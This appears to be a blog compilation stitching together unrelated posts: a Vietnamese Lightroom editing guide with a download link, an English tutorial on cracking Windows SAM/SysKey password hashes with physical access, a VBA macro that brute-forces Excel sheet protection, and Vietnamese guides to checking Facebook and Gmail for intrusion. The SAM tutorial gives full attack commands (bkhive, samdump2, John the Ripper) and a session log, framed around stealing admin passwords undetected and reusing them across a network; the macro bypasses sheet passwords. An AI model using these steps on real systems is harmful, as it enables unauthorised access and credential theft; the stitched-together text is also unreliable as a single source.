Biên tập ảnh chuyên nghiệp với Adobe Photoshop Lightroom

TTO - Photoshop Lightroom là một trong số các phần mềm biên tập, xử lý ảnh chuyên nghiệp nhất hiện nay. Sở hữu hàng loạt tùy chọn sẵn có, Lightroom hỗ trợ rất tốt cho cả những người mới làm quen với ảnh số và kĩ thuật xử lý hậu kì, dễ dàng hơn nhiều so với khi thao tác cùng Photoshop.




Lưu ý, các tùy chọn dưới đều thực hiện với định dạng ảnh RAW. Trong số các module của Lightroom, Develop chính là trung tâm xử lý kĩ thuật. Library giúp người dùng duyệt dữ liệu ảnh. Print để in ảnh. Slideshow giúp tạo các tập tin trình chiếu và Web xuất ảnh lên mạng.Bạn có thể tham khảo 10 mẹo xử lý cơ bản sau đây với Lightroom để biến bức ảnh nguyên gốc thành những tác phẩm thực sự mang dấu ấn cá nhân của tác giả.

1. Chọn “Develop” để hiệu chỉnh các thông số chung cơ bản cho tấm ảnh. Một mẹo nhỏ là tăng độ đậm nền tối cho bức ảnh bằng cách kéo thanh tuỳ chỉnh Black lên ngang mức + 5 hoặc hơn (Vào mục Color, chọn thanh Basics). Tuỳ chỉnh này sẽ làm cho bức ảnh giàu sức sống hơn.

2. Bạn có thể thêm các họa tiết vào bức ảnh bằng cách truy cập thanh Effect, chọn Post-Crop Vignetting. Chọn mức họa tiết xuống -15 để tăng tông màu đen cho các góc ảnh, khiến mắt người xem sẽ tập trung hơn vào trung tâm. Có một phương án khác là bạn chọn mức họa tiết + 15, sẽ làm tăng ánh sáng của các góc ảnh, phù hợp với cảnh chụp hoa lá hoặc ảnh cưới. Kĩ thuật này sẽ làm tăng độ sáng, mang lại cảm giác tươi sáng, nhẹ nhàng của không gian ảnh.


3. Sử dụng bộ lọc Graduated Filter để thay đổi các thành phần của ảnh, tạo nên hiệu ứng chọn lọc theo vùng. Một trong số các tùy chọn khá hay của Graduated Filter là mức phơi sáng (Exposure) -33, sau đó bạn nhấn vào cuối bức ảnh và kéo công cụ sang nửa còn lại. Thao tác này sẽ tạo nền riêng cho không gian phía dưới bức ảnh, bức ảnh có thêm chiều sâu. (Để chọn công cụ này, bạn quan sát các biểu tượng tuỳ chọn ở phía dưới biểu đồ Histogram, chọn biểu tượng thứ 4 từ trái sang. Khi thao tác chưa ưng ý, bạn chỉ cần nhấn chuột để chọn, sau đó nhấn tổ hợp phím Ctrl+ Z để bỏ lệnh vừa thực hiện).


4. Ở bảng tùy chỉnh Tone Curve, bạn có thể điều chỉnh bóng của ảnh. Chọn Shadows tới -10 và Darks tới + 10 sẽ tăng sự sinh động cho bức ảnh, cũng như thêm vào độ tương phản tinh tế trên toàn bộ bức ảnh.


5. Bạn có thể giảm màu sắc của bầu trời, khi ảnh chụp quá sáng bằng cách điều chỉnh độ chói. Nhấn vào thanh chứa thông số HSL, chọn Luminance. Tiếp đó chọn thanh Adjust ở phía trái, đưa tới vị trí trên cùng bầu trời trong bức ảnh và kéo xuống. Thao tác này sẽ giúp bức ảnh thêm tự nhiên, bầu trời xanh mướt.


6. Các bức ảnh đen trắng vẫn chiếm được cảm tình của nhiều người. Lightroom có sẵn các công cụ để chuyển từ ảnh màu sang ảnh đen trắng chỉ với một cú nhấp chuột. Bạn cũng có thể tự mình thực hiện chuyển đổi này, vừa đưa thêm một số hiệu ứng bằng cách điều chỉnh Vibrance và Saturation. Ở thanh Basic, bạn chọn Vibrance và Saturation ở mức -75. Bức ảnh xuất sẽ trông giống như ảnh đen trắng nhưng vẫn giữ lại được một chút màu sắc, tạo nên những hiệu ứng thú vị. Các bức ảnh đen trắng thường có thêm độ tương phản, do đó, bạn hãy tăng độ sắc nét Clarity từ 50 đến 70.

7. Sử dụng tuỳ chọn Clarity (ở thanh Basic) để điều chỉnh sắc thái khuôn mặt. Để thêm độ mạnh mẽ một chút, bạn có thể tăng tuỳ chỉnh, ngược lại, muốn làm mềm mại da mặt, hãy giảm tuỳ chọn Clarity!

8. Bạn có thể thêm vào các hạt lốm đốm vào bức ảnh, để tạo ra tác phẩm mang phong cách của một bức ảnh thời xưa. Để thực hiện, bạn vào thanh Effect, chọn Grant và tăng lên 5 hoặc 10 điểm.

9. Nếu bạn muốn tạo một bức ảnh sống động mà không muốn lũ trẻ nhà mình trong hình bị rám nắng làn da, hãy nhớ điều chỉnh tăng Vibrance cao hơn Saturation. Vibrance chủ yếu gọi hai tông màu xanh lá cây và xanh da trời, trong khi Saturation có xu hướng chọn màu đỏ và vàng. Nếu bạn tăng Saturation cao hơn Vibrance, da sẽ bị rám. Nên chọn tỉ lệ Vibrance cao gấp 2-3 lần Saturation.

10. Để xử lý ảnh chân dung, hãy chọn Spot Removal để làm mịn các điểm xấu trên khuôn mặt. Chọn các thông số của chổi quét ở Healing Tool, thay vì Clone, nhằm tăng tốc, kết quả rõ hơn. Lưu ý, mức tuỳ chọn là 80 %  tốt hơn 100 % để dọn dẹp các nét xấu trên khuôn mặt, nhưng vẫn giữ được nét gốc.

link download:http://www.mediafire.com/?3q8t55ffgjnc9iv

Cracking Syskey and the SAM on Windows XP, 2000 and NT 4 using Open Source Tools

Update: 03/05/2007: I've made a single page with links to all of my
tutorials on

SAM/SYSKEY Cracking, visit it if you want more information on this topic.

Update 03/22/2005: See Shockwave
Flash Video Version.

        A little over a year ago I wrote a little tutorial called "Cracking Windows 2000 And XP Passwords With Only Physical Access" [0]. It was pretty popular and the data is still useful but in the last year I've found far better ways to crack a SAM file with SysKey enabled. One reason I'm writing this new tutorial is because sometime after SAMInside v.2.1.3 exporting to a PWDump file was disabled in the demo version. There are still ways SAMInside could be used, but there are better Open Source tools now that can do the same tasks. This tutorial will recap parts of the original, but also give a far simpler, faster and more concise way to crack hashes in the SAM file that are protected by SysKey.




        SysKey is an extra level of encryption put on the hashes in the SAM file [1]. SysKey was introduced in Service Pack 3 (SP3) for NT 4 but every version of Windows since has had SysKey enabled by default. The way most folks crack a SAM file on a system that uses SysKey is by running a utility called PWDump as an admin to get the LM (LAN Manager) and NT hashes. The problem is PWdump only works if you can run it from an administrator level account, and if the reason an attacker is cracking the hashes in the first place is to get an administrator level account then PWdump is of little use.



        Some folks will ask why would you want to crack the passwords in the SAM at all since it's far easier to just change the Administrator password using a Linux boot disk or Sala's Password Renew for PE Builder. The reason an attacker may want to crack the local passwords instead of changing them is two fold:

1. An attacker doesn't want to tip off the system administrators. If they notice that the old local admin password no longer works they will get a little bit suspicious don't you think? This is somewhat solved by Sala's Password Renew since it lets you add new admin level accounts as well as change existing account's passwords.

2. The same local account passwords may be used on other systems on the network (and most likely are if they use imaging software like Ghost). If the attacker can crack one machine's admin password that same password may allow the attacker to gain access to other boxes on that LAN that they only have remote access (across the network) to.

        This article assumes that the attacker has only physical access to the machine whose SAM they want to crack and that they also have access to the Knoppix variant known as the Auditor security collection boot CD [5] (I'm using version 120305-01 in this tutorial). Here are the steps you will need to take in order to audit local passwords using the Auditor CD:



Step 1. Download the Auditor Boot CD ISO and burn it to a CD-R. All of the tools we will be using in this tutorial come on the Auditor Boot CD.



Step 2. Insert the Auditor Boot CD into the target system, reboot and set the CD-ROM as the first boot device in the BIOS. Some systems let you hold down a certain function key at startup to choose what media to boot from (on recent Dell's it's F12).



Step 3. Auditor will begin to boot and ask you what screen resolution you want to use. Choose a resolution that your monitor and video card will support (I use 2 for 1024x768) then hit enter.



Step 4. When Auditor finishes booting click on the icon on the KDE bar for a new terminal window (it looks like a little monitor). Below you will see the commands you will have to use to get past SysKey, extract the hashes and attempt to crack the password hashes.


Step 5. Mount the local hard disk, most likely hda1:

Linux Command:

mount /dev/hda1

Step 6. Change the present working directory to the ramdisk so we space to work with the files we will be creating:

Linux Command:

cd /ramdisk/

Step 7. Auditor comes with Ncuomo's Samdump2 and Bkhive [6]. We will be using these tools to extract the system key from the System hive and the password hashes from the SAM file. To get the system key we need to use the Bkhive on our SYSTEM file (most likely in C:\WINDOWS\system32/config\SYSTEM, that's where it is on my XP Pro test box, on some systems it will me in C:\WINNT\system32/config\SYSTEM or perhaps some other drive entirely). By the way, if for some reason you are running NT4 SP3 you will need to use Bkreg instead, all later system (NT4 SP4, 2000 and XP) use Bkhive. To grab the system key and put it into a file we use the following command:

Linux Command:

bkhive-linux /mnt/hda1/WINDOWS/system32/config/system saved-syskey.txt

Step 8. Now that we have the system key we can use it to undo SysKey on the SAM, extract the hashes and place them into a PWDump format file:

Linux Command:

samdump2-linux /mnt/hda1/WINDOWS/system32/config/sam saved-syskey.txt>password-hashes.txt

Step 9. At this point we have a PWDump format file called password-hashes.txt that we could copy off of the system and import into L0phtcrack [7] or Cain [8] (see the old tutorial for details). Since I said we were going to do it all with the Auditor CD and Open Source tools we will use John the Ripper to crack the hashes, but before we can use John we have to extract one of the many wordlists that comes with Auditor. Take a look on the CD in /opt/auditor/full/share/wordlists/ for all of the different wordlists you can use, I'll use english.txt for this tutorial. To extract english.txt to the ramdisk use the following command:

Linux Command:

gunzip -c /opt/auditor/full/share/wordlists/english/english.txt.gz> /ramdisk/eng.txt

Step 10. Now that everything is in place we can run John with a simple dictionary attack to see if we can crack any of the hashes:

Linux Command:

john password-hashes.txt -w:eng.txt

        John detects that the dump file has LM (LAN Manager) hashes in it and chooses the format "NT LM DES [32/32 BS]" automatically. If I had disabled the storing of LM hashes in the SAM I might want to use the –f option to specify the NT hash format and try to crack the NT hashes instead. To do that I would use the following command:

Linux Command:

john password-hashes.txt -f:NT -w:eng.txt

        If dictionary attacks aren't working and you have a lot of time (as well as a fast computer) you can try John's incremental (brute force) mode and see if it gives you better results:

Linux Command:

john password-hashes.txt -i:all

        Incremental mode is limited to only eight characters unless you change the source before you compile it, but at more than eight characters you will likely be waiting a very long time for John to finish. Doing more that eight characters is pointless anyway if you have the LM hashes since there are stored as two seven byte parts (NT hashes are a different story and can be harder to crack).



        In case you were wondering what all of these commands would look like along with their output here is a copy of my session log that may help you understand how they all work together (notice that the password for the Administrator account is "monkey"):

Session Log saved from Auditor CD:

root@1[~]# mount /dev/hda1 root@1[~]# cd /ramdisk/ root@1[ramdisk]# bkhive-linux /mnt/hda1/WINDOWS/system32/config/system saved-syskey.txt Bkhive ncuomo@studenti.unina.it Bootkey: 407af4376e55f1fd6d58cc47a4fa4c01 root@1[ramdisk]# samdump2-linux /mnt/hda1/WINDOWS/system32/config/sam saved-syskey.txt>password-hashes .txt Samdump2 ncuomo@studenti.unina.it This product includes cryptographic software written by Eric Young (eay@cryptsoft.com) No password for user Guest(501) No V value! root@1[ramdisk]# gunzip -c /opt/auditor/full/share/wordlists/english/english.txt.gz> /ramdisk/eng.txt root@1[ramdisk]# john password-hashes.txt -w:eng.txt Loaded 3 password hashes with no different salts (NT LM DES [32/32 BS]) MONKEY           (Administrator) guesses: 1  time: 0:00:00:03 100%  c/s: 1622943  trying: ZZYZX - ZZZZZZZ root@1[ramdisk]# john password-hashes.txt -f:NT -w:eng.txt Loaded 2 password hashes with no different salts (NT MD4 [TridgeMD4]) monkey           (Administrator) guesses: 1  time: 0:00:00:12 100%  c/s: 464435  trying: zzzzzzzzzzzzzzzzzzzzzz root@1[ramdisk]#

Mitigating SAM and SysKey Cracking



        There are a few things you can do to make it harder for attacker to crack you local passwords. An attacker will most likely have to get into the BIOs to set it to boot from the CD-ROM. Setting up a BIOs password will help keep crackers from using the Auditor CD (or any boot CD) but if they can get into the computer's case it's easy to reset a BIOs password so some sort of physical case lock should be used as well. Strong passwords (non-dictionary words with more that just alphanumeric characters) will also make it harder for attackers to crack passwords since they will have to resort to potentially slow brute force methods.



        I hope this short tutorial helps, feel free to write me if you have any questions. Some other techniques you may want to look into for faster cracking are cracking clusters [9] and Rainbow tables [10]. Enjoy your hash.
:)



References and further research:



[0] Old Tutorial:

http://www.irongeek.com/i.php?page=security/localsamcrack

or

http://www.antionline.com/showthread.php?s=&threadid=260337


[1] Information on SysKey from Microsoft:


http://support.microsoft.com/kb/310105


[2] Linux boot diskette that can reset local NT/2000/XP passwords:

http://home.eunet.no/~pnordahl/ntpasswd/bootdisk.html



[3] Sala's Password Renew

http://www.sala.pri.ee/



[4] Bart's Pe Builder:

http://www.nu2.nu/pebuilder/


[5] Auditor security collection boot CD:


http://www.remote-exploit.org/index.php/Auditor_main



[6] Ncuomo's Samdump2, Bkhive and Bkreg:

http://studenti.unina.it/~ncuomo/syskey/


[7] L0phtcrack Web Page:

http://www.atstake.com/products/lc/



[8] Oxid.it's Cain Web Page:

http://www.oxid.it/cain.html


[9] NeuTron's tutorial on making a password cracking cluster:

http://www.antionline.com/showthread.php?s=&threadid=262750



[10] Rainbow Crack:

http://www.antsight.com/zsl/rainbowcrack/


Way more details about SAM cracking then you may ever want to know:

http://www.beginningtoseethelight.org/ntsecurity/index.php#0FEB224E21024B8C

Gở Pass Protect sheet Excel

Tạo macro và run:
Sub PasswordBreaker()
If ActiveSheet.ProtectContents = False Then
MsgBox "Sheet '" & ActiveSheet.Name & "' is unprotected!", vbInformation
Else
If MsgBox("Sheet '" & ActiveSheet.Name & "' is protected, do you want to unprotect it?", _
vbYesNo + vbQuestion, "Unprotect Active Sheet") = vbNo Then Exit Sub

Dim i As Integer, j As Integer, k As Integer
Dim l As Integer, m As Integer, n As Integer
Dim i1 As Integer, i2 As Integer, i3 As Integer
Dim i4 As Integer, i5 As Integer, i6 As Integer
On Error Resume Next
For i = 65 To 66: For j = 65 To 66: For k = 65 To 66
For l = 65 To 66: For m = 65 To 66: For i1 = 65 To 66
For i2 = 65 To 66: For i3 = 65 To 66: For i4 = 65 To 66
For i5 = 65 To 66: For i6 = 65 To 66: For n = 32 To 126
ActiveSheet.Unprotect Chr(i) & Chr(j) & Chr(k) & _
Chr(l) & Chr(m) & Chr(i1) & Chr(i2) & Chr(i3) & _
Chr(i4) & Chr(i5) & Chr(i6) & Chr(n)
Next: Next: Next: Next: Next: Next
Next: Next: Next: Next: Next: Next
If ActiveSheet.ProtectContents = False Then MsgBox "Sheet '" & ActiveSheet.Name & "' is unprotected!", vbInformation
End If
End Sub

Làm thế nào để biết tài khoản Facebook của bạn có bị hack?

Rất nhiều người trong số chúng ta thích sử dụng Facebook, tuy nhiên nếu không cẩn thận rất có thể tài khoản Facebook cá nhân sẽ bị hack hoặc bị sử dụng vào các mục đích xấu.


Đơn giản nhất là bị lạm dụng để lừa đảo, phát tán tin rác, hay nếu như bạn quên không đăng xuất từ một máy tính công cộng thì nhiều điều xấu hơn có thể xảy ra. Tương tự như các thao tác để kiểm tra tài khoản Gmail bị hack, các bước hướng dẫn dưới đây sẽ giúp bạn kiểm tra xem tài khoản Facebook của mình có bị hack không đồng thời cung cấp một vài giải pháp cho trường hợp tài khoản đã bị hack.
Kiểm tra các hoạt động đáng ngờ trên Facebook
Facebook cung cấp tính năng giúp bạn có thể kiểm tra các lần đăng nhập gần nhất, từ đó bạn có thể xác định xem một ai đó đã sử dụng tài khoản của bạn để đăng nhập vào từ một nơi khác, hoặc cũng có thể bạn đã để chế độ “nhớ mật khẩu” ở một máy tính nào đó. Để truy cập vào tính năng này bạn vào Account Settings
< class="image-container image-center" style="width:460px">Rồi chọn Account Security
< class="image-container image-center" style="width:460px">Và sẽ nhìn thấy danh sách các hoạt động gần nhất, nếu phát hiện đăng nhập đáng ngờ bạn có thể chọn “end activity” để có thể đăng xuất từ xa phiên truy cập đó.
< class="image-container image-center" style="width:460px">

Nhận thông báo khi có thiết bị mới đăng nhập vào tài khoản

Cũng từ trong giao diện Account Security bạn sẽ thấy có mục “Login Notification”. Chọn “On” để Facebook gửi sms hoặc email thông báo nếu phát hiện một thiết bị mới đăng nhập vào tài khoản của bạn. Tính năng này cho phép bạn chủ động đối phó với các rủi ro tiềm tàng.

Nếu tài khoản Facebook đã bị hack

Trong trường hợp phát hiện tài khoản bị hack mà bạn không truy cập được nữa thì việc đầu tiên cần làm là thiết lập lại mật khẩu.
Tuy nhiên

1. Nếu tài khoản email dùng để đăng nhập Facebook cũng đã bị chiếm bởi một người khác, bạn có thể tìm cách lấy lại tài khoản Facebook ở đây.
2. Nếu tài khoản email dùng để đăng nhập Facebook bị thay đổi bởi một người khác (ví dụ hacker chiếm tài khoản Facebook của bạn và đổi địa chỉ email đăng nhập), bạn có thể tìm giải pháp khắc phục ở đây.
3. Và nếu như tài khoản của bạn gửi tin nhắn spam đến bạn bè thì tốt nhất bạn nên kiểm tra virus, malware máy tính mà bạn sử dụng để đăng nhập vào Facebook.

Tất nhiên trong mọi trường hợp phòng bệnh lúc nào cũng tốt hơn chữa bệnh. Chính vì vậy đê luôn chủ động trong mọi tình huống bạn nên tham khảo trước những hỗ trợ về bảo mật của Facebook tại đây.
Theo FriedBeef's Tech

Làm thế nào để kiểm tra nếu tài khoản Gmail bị hack?

Nếu bạn đang lo lắng và nghi ngờ về độ bảo mật của tài khoản Gmail của mình, thì các bước dưới đây sẽ giúp bạn kiểm tra xem liệu tài khoản của bạn có bị hack hay không? Và nếu có thì làm thế nào để khắc phục?

Bước 1: Xem các hoạt động gần đây nhất của tài khoản Gmail

Sau khi login vào tài khoản Gmail, bạn kéo xuống dưới cùng sẽ thấy hoạt động cuối cùng (“Last account activity”), chọn Detail để xem chi tiết.

Bước 2: Tìm hiểu xem ai đã login vào tài khoản thời gian gần đây

< class="image-container image-center" style="width:460px">Khi chọn thông tin chi tiết của các hoạt động gần đây nhất, bạn sẽ được Google cung cấp các thông tin truy cập vào tài khoản bao gồm:

• Kiểu truy cập: truy cập thông qua trình duyệt web, điện thoại hay thông qua các chương trình đọc mail qua các giao thức POP, IMAP
• Địa chỉ IP và địa điểm truy cập
• Thời điểm truy cập

Bước 3: Tìm hiểu thêm thông tin về địa chỉ IP để xem tài khoản Gmail của bạn có thực sự đã bị hack hay chưa?

< class="image-container image-center" style="width:460px">Nếu bạn thấy trong thông tin truy nhập có địa chỉ IP nước ngoài, ở một nơi bạn chưa từng đến, thì cũng đừng quá lo lắng. Rất có thể bạn đang sử dụng dịch vụ của một hãng thứ 3 để lấy mail về. Ví dụ như bạn có thể sử dụng tài khoản hotmail để kéo mail từ Gmail về đó.
Tuy nhiên bạn cũng nên sử dụng trang web DomainTools để xác định thêm thông tin về địa chỉ IP đó, như thuộc công ty nào, ở đâu … Những thông tin này sẽ rất hữu ích trong việc xác định xem tài khoản Gmail của bạn có bị hack hay không?

Bước 4: Hiểu các cảnh báo của Google

< class="image-container image-center" style="width:460px">Google giám sát tất cả các hoạt động của người dùng và đưa ra cảnh báo khi thấy bất cứ nghi vấn nào về khả năng tài khoản bị truy cập trái phép. Đồng thời Google cũng đưa ra gợi ý về các hành động cần thực hiện như gợi ý người dùng đổi password trong trường hợp phát hiện nghi vấn.

Bước 5: Sign Out tất cả các phiên làm việc

< class="image-container image-center" style="width:460px">Nếu bạn lỡ quên không sign out khỏi phiên làm việc ở một máy tính công cộng thì cũng không phải quá lo lắng. Bạn chỉ cần login vào tài khoản Gmail và chọn tính năng “Sign out all other sessions” để thoát khỏi toàn bộ các phiên làm việc khác. Tính năng này tuy không giúp bạn lấy lại tài khoản đã bị hack, tuy nhiên nó giúp bạn sửa chữa những sơ suất do lơ đãng. Nó cũng rất hữu ích trong trường hợp bạn bị mất điện thoại và bạn không muốn bị người khác đọc trộm mail.

Bước 6: Khi phát hiện tài khoản Gmail đã bị hack

Việc đầu tiên cần phải làm khi phát hiện tài khoản Gmail đã bị hack là đổi ngay mật khẩu và câu hỏi bảo mật. Google cung cấp cho chúng ta một số mẹo khá hay, như:

• Chỉ chọn những câu hỏi bảo mật nào bạn chắc chắn biết câu trả lời, và câu hỏi bảo mật không hề có liên quan gì đến mật khâu.
• Chọn câu hỏi bảo mật sao cho người khác không thể tìm câu trả lời thông qua việc tìm hiểu bạn (ví dụ nên tránh sử dụng họ tên, ngày tháng năm sinh, số điện thoại, tên các con vật nuôi .. của bạn để làm câu hỏi)
• Chắc chắn rằng bạn có thể nhớ được câu trả lời cho câu hỏi bảo mật của mình, tuy nhiên câu trả lời cũng đừng nên dễ đoán quá. Câu trả lời càng hoàn chỉnh thì tính bảo mật càng cao.

Việc sử dụng các bước trên sẽ giúp bạn hiểu hơn về nhật ký các hoạt động (activity log) với tài khoản Gmail của bạn, cũng như giúp bạn kiểm tra xem tài khoản của mình có bị hack hay không.
Theo FriedBeef's Tech